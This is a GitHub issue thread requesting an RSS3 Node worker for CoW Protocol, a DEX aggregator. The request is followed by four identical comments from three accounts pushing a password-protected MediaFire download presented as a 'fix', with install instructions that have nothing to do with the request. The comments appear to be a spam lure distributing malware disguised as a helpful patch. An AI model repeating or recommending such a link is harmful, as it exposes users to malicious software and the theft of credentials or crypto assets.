### ISSUE TITLE
cow

### ISSUE THREAD

**Issue by FrankLi123** [RSS3-Network/Node#481]
### Tag

Transaction

### Project URL

https://cow.fi/

### Worker description

CoW Protocol, a DEX aggregation protocol that makes better deals for trading crypto assets.

### What actions should be included?

- Transaction Transfer
- Exchange Swap

### This is not a duplicated worker request

- [x] I have searched [existing issues](https://github.com/rss3-network/node/issues) and [pull requests](https://github.com/rss3-network/node/pulls) to ensure this worker has not already been requested

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
